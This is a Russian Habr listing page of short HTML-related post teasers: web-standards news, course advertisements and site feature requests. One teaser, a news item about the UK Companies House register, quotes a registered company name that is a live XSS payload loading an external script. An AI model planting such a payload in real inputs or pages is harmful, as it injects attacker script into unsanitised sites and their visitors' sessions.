Pull to refresh

Новый HTML-элемент <portal> от Google призван заменить фреймы

Website development *CSS *JavaScript *Google Chrome HTML *


На конференции разработчиков I/O 2019 компания Google представила новую технологию под названием «порталы», которая призвана обеспечить новый способ загрузки и навигации по веб-страницам.

По словам Google, «порталы» работают с помощью нового HTML-тега под названием <portal>. Этот тег работает аналогично классическим тегам <iframe>, позволяя веб-разработчикам вставлять удалённый контент на свои страницы.
Читать дальше →
Total votes 28: ↑26 and ↓2 +24
Views 22K
Comments 39

В британском реестре компаний обнаружили XSS

Information Security *JavaScript *HTML *

Выпуск комикса XKCD 327 «Мамины эксплойты» в переводе xkcd.ru

20 октября некто Джим Уокер поделился на форуме разработчиков британского государственного реестра компаний Companies House интересным наблюдением. Companies House допускает в именах компаний символы < и >. Это открывает простор для атак на тех сайтах, которые не фильтруют и не экранируют управляющие символы корректным образом. Если сайт отображает название компании и не санитизирует данные, то он потенциально уязвим к XSS-атаке.

Уокер обнаружил, что 16 октября некий Майкл Джон Тэнди зарегистрировал компанию с названием "><SCRIPT SRC=HTTPS://MJT.XSS.HT></SCRIPT> LTD. Если XSS-фильтра нет, то такое имя компании внедряет на веб-страницу код, который вызывает внешний JavaScript.
Читать дальше →
Total votes 10: ↑10 and ↓0 +10
Views 3.6K
Comments 4

X5 frontend meetup

X5 Tech corporate blog JavaScript *Fidonet *HTML *IT career

1 июля в 19:00 приглашаем на офлайн-митап про фронтенд-разработку от Х5 Group. Обещаем много реального опыта и обсуждения злободневных вопросов от крутых экспертов из Х5 Group, Mish.Design, Tinkoff и Evil Martians.

Регистрация

Читать далее
Total votes 4: ↑4 and ↓0 +4
Views 1K
Comments 0

Спринт посреди жары. Коротаем вечера за веб-разработкой

HTML Academy corporate blog CSS *Programming *HTML *Studying in IT

На континенте вновь жара и снова Евро (и Дзюба не справляется, и курс), а мы на это снова тратим время, свой главный ограниченный ресурс. Под грустные трансляции футбола в жару страной проводим вечера. И было бы ужасно бестолково, но мы же тут родились не вчера.

Мы сели в Академии в кружочек (такой, побольше, всё-таки ковид), сидели от утра до поздней ночи и вроде бы решили — будет спринт. 

Берём всех тех, кто хочет во фронтенде достичь ещё невиданных высот, готовим им прикольные проекты, даём статьи и, в общем-то, вперёд. Добавим чат с такими же, кто в жизни ещё не раз потрогает гриды. Подробности под катом (кнопка ниже), там все детали, запись и т.д.

Читать далее
Total votes 8: ↑8 and ↓0 +8
Views 1.5K
Comments 0

Причиной неполадок «Госуслуг» стали новые сервисы

Web design *HTML *Social networks and communities

«Госуслуги» ввели два новых сервиса для обжалования решений контролирующего органа и исправлений сведений о трудовом стаже в ПФР. Внедрение новых сервисов привело к сбоям в работе «Госуслуг» и появлению получасовой очереди на посещение сайта. Некоторые пользователи обходили таймер, меняя значения в исходном коде страницы.

Читать далее
Total votes 25: ↑24 and ↓1 +23
Views 11K
Comments 38

Google отказалась от изменений уведомлений Chrome, которые ломали сайты и веб-приложения

Google Chrome HTML *Browsers

Google отменила удаление в Chrome предупреждающих окон браузера и других подсказок, созданных с помощью cross-origin iFrame, после того, как данное обновление за последние две недели сломало многие веб-приложения и встревожило разработчиков.

IFrame — это компонент HTML-элемента, который позволяет встраивать документы, видео и интерактивные медиафайлы на страницу (другими словами, кадр внутри кадра). Используя данный компонент, можно отобразить дополнительную страницу на главной веб-странице.

Элемент iFrame позволяет включать часть содержимого из других источников, что и называется cross-origin iFrame. Он может интегрировать контент в любом месте на вашей странице, без необходимости включать их в структуру веб-макета, как традиционный элемент.

Читать далее
Total votes 11: ↑11 and ↓0 +11
Views 5.2K
Comments 6

Что выучить, чтобы работать фулстеком. Приглашаем на профессию «Фулстек-разработчик»

HTML Academy corporate blog Website development *JavaScript *Studying in IT IT career

Профессия в HTML Academy — 6 курсов, на которых научим вас верстать по-современному, писать фронтенд на JavaScript и делать бэкенд на Node.js. После обучения — практика в команде с живыми людьми. Ближайшая профессия «Фулстек-разработчик» начинается 24 августа, поэтому есть немного времени объяснить подробнее.

На профессии вы научитесь делать веб-приложения целиком, без сомнений по поводу того, как подключить базу или прикрутить слайдер. Всё сможете сами. Будете строить архитектуру клиентских и серверных приложений, поймёте, как работают и пишутся SPA, как применять ООП и паттерны проектирования, освоите стек React (Redux, Redux Thunk, Axios), познакомитесь с TypeScript, автоматизированным тестированием и базами данных MongoDB и PostgreSQL. Уф.

Это не просто так столько всего — это всё нужно, чтобы работать фулстеком.

Узнать подробнее
Total votes 15: ↑9 and ↓6 +3
Views 3.3K
Comments 2

Начни карьеру frontend-разработчика в СберМаркете

СберМаркет corporate blog JavaScript *HTML *Studying in IT IT career

Всем привет! Мы открываем набор на оплачиваемую стажировку для начинающих фронтендеров.

Лекции и практические занятия подготовят новичков к работе над реальными фронтенд-задачами, а наши менторы в течение всей стажировки будут рядом, чтобы передать свой опыт.

Подать заявку можно до 14 ноября.

Подробнее о стажировке
Total votes 3: ↑3 and ↓0 +3
Views 8.2K
Comments 15

Исследование: Google меняет 61% заголовков для выдачи у 81 тысячи страниц

Search engines *HTML *Research and forecasts in IT *Search engine optimization *

Исследователь Zyppy Сайрус Шепард опубликовал итоги своих наблюдений по поводу того, как Google работает с тегами заголовков. По его словам, компания поменяла 61% заголовков для выдачи у 81 тысячи исследованных страниц.

Читать далее
Total votes 8: ↑8 and ↓0 +8
Views 4.4K
Comments 1

Mozilla обновила MDN и готовится к запуску MDN Plus

Website development *CSS *JavaScript *HTML *

Mozila обновила ресурс MDN (Mozilla Developer Network). Изменили внешний вид веб-портала, улучшили систему поиска и переработали сортировку по темам. Вместе с этим анонсировали премиальную подписку MDN Plus, позволяющую персонализировать документацию под собственные нужды.

Читать далее
Total votes 14: ↑14 and ↓0 +14
Views 4.5K
Comments 3

Mozilla запустила платный сервис MDN Plus

Website development *CSS *JavaScript *HTML *IT-companies

Mozilla запустила новый платный сервис MDN Plus, который дополнит такие коммерческие инициативы, как Mozilla VPN и Firefox Relay Premium. Стоимость подписки составит $10 в месяц или $100 в год.

Читать далее
Total votes 10: ↑10 and ↓0 +10
Views 9.3K
Comments 15

Бесплатный интенсив «Основы HTML и CSS за 10 дней»

HTML Academy corporate blog Website development *CSS *HTML *Web services testing *

Кажется, почти все на Хабре сталкивались с HTML и CSS, даже если не занимаются этим на работе. Ну знаете, все эти «сделай кнопку покруглее», «сделай текст более красненьким», или кому-то из друзей сайт собрать. Авторы статей сталкивались с редактором Хабра (особенно старым). Или вот, например, наш выпускник, бывший системный администратор, пишет:

Когда я работал сисадмином, однажды со словами «Тыжпрограммист, помоги!» ко мне обратился друг, которому нужен был интернет-магазин. Я кое-как разобрался в движках, хостинге и всём остальном, и запустил ему магазин на Opencart с бесплатным шаблоном на Bootstrap. Ковыряться с этим мне понравилось, но я понимал, что многое сделал криво (например, изменял размер шрифта с помощью замены тега с h2 на h3 и т.д.

В общем, принцип понятен. И знания вроде есть, и нагуглить, как правильно, можно, но у большинства из базы, чтобы сделать что-то сразу и наверняка, нет. И это нормально. Но с базой-то лучше, особенно, если часто приходится забираться в вёрстку. Поэтому приглашаем на интенсив, где расскажем всё об основах современной вёрстки сайтов и научим всякому. Подробности под катом.

Читать далее
Total votes 4: ↑4 and ↓0 +4
Views 3.2K
Comments 3

Первые шаги в веб-разработке: подборка бесплатных занятий Нетологии

Нетология corporate blog Website development *CSS *JavaScript *HTML *

Считается, что самый простой способ начать карьеру в ИТ — стать тестировщиком. Есть и другое направление: его относительно просто освоить на базовом уровне, но оно открывает большие перспективы. Речь о веб-разработке. Только на hh.ru постоянно открыто окло 2000 вакансий для таких специалистов. Мы собрали несколько бесплатных курсов и лекций для начинающих.

Читать далее
Total votes 6: ↑3 and ↓3 0
Views 5.9K
Comments 0

Приглашаем на бесплатный челлендж по веб-разработке

HTML Academy corporate blog Website development *CSS *JavaScript *HTML *

Коллеги, давайте все задачи уже после майских. Потому что на майских позанимаемся веб-разработкой на майском челлендже. За 10 дней вы выучите основы вёрстки на HTML и CSS и программирования на JavaScript и PHP. 

Если вы уже что-то умеете — структурируете, если ещё не умеете — сам Тим Бёрнерс-Ли велел (возможно, мы не проверяли). Главный приз — бесплатное обучение на курсе «HTML и CSS. Профессиональная вёрстка сайтов». На него претендуют все участники, дошедшие до конца.

Подробности под катом

Вот здесь
Total votes 2: ↑2 and ↓0 +2
Views 896
Comments 0

С чего начать карьеру в IT: лайвы HTML Academy в июле

HTML Academy corporate blog Website development *CSS *HTML *

Привет, Хабр! Мы не знаем, как у вас, но в Питере жара. Мозги плавятся настолько, что тяжело отличить джаву от джаваскрипта, а вместо foo хочется в bar. Но мы всё-таки сделаем усилие и расскажем всем желающим о самых легких путях во фронтенд.

Потому что о том, зачем туда идти, все уже знают и посмеиваются над этим постом со своих гамаков и шезлонгов.

Читать далее
Total votes 2: ↑2 and ↓0 +2
Views 805
Comments 0

html в почте

Habr
В комментариях, которые приходят на почту, указан Content-Type: text/plain, а в теле письма (если ответ содержал html) присутствует html, который разумеется не обрабатывается. Наверное имеет смысл либо чистить от html присылаемый текст, либо указать соответствующий content-type.
Total votes 1: ↑1 and ↓0 +1
Views 1.2K
Comments 2

Подсказки в «Разрешенные html-тэги»

Habr
При клике на «Разрешенные html-тэги» выскакивает окошко с допустимыми тэгами, в котором парные тэги указываются, к примеру, — <b></b>

А вот тэг <a href=''> почему-то не удостоился такой чести =(
Сначала подумалось, что ошибка, но взглянув на все остальное, решил, что это фича такая, а оказалось что нет =(
Total votes 2: ↑1 and ↓1 0
Views 3.1K
Comments 14

HTML теги <acronym>, <small>, <sup> и др.

Habr
Мне кажется, было бы логично разрешить для использования в комментариях и текстах следующие HTML теги:
  • <acronym> — для удобной расшифровки сокращений, которые в великом множестве присутствуют в IT текстах
  • <big>, <small> — родные, но почему-то обделённые братья разрешённых смысловых тегов <em> и <strong>
  • <sup> и <sub> — могут пригодиться для сносок, примечаний, записи химических и прочих формул
Total votes 15: ↑13 and ↓2 +11
Views 1.1K
Comments 21

Разершите использование тегов заголовков в текстах статей

Habr
Элементов заголовков, если уж быть точным. Очень неудбно размечать заголовки элементами B или STRONG. Нелогично, непривычно. Имело бы смысл разрешить использовать в текстах статей (не в комментариях!) заголовки младших уровней.
Total votes 6: ↑4 and ↓2 +2
Views 686
Comments 2